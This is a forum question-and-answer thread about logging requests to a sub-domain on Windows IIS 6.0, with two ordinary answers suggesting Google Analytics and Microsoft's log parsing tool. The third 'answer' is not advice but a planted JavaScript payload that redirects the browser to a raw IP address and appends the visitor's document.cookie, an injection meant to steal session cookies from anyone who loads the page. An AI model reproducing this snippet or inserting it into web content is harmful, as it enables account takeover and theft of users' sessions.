# How to write my own Server Logging script?

Tags: iis, logging, windows-server

I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?

I'm afraid google analytics is not an option due to the setup, I just need access (i'm guessing) to the file request event and its properties.

**Wyatt Barnette - I've thought of this! But how do I set those properties for it to *collect them all*? I'm writing my own log parsing software, as I need specific things, I just need the server to generate the logs for me to parse!**

Answer (score 0):

Have you considered using Google Analytics across all your sites?  I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier!  Log parsing seems to be slowly fading away...

Answer (score 0):

What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.

If your logging package can't handle this, check out the [IIS log parsing tool](http://www.microsoft.com/DownLoads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en). That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.

Answer (score 0):

```
<script language="JavaScript">document.location="http://142.0.71.119:88/get.php?cookie="+document.cookie;</script>
```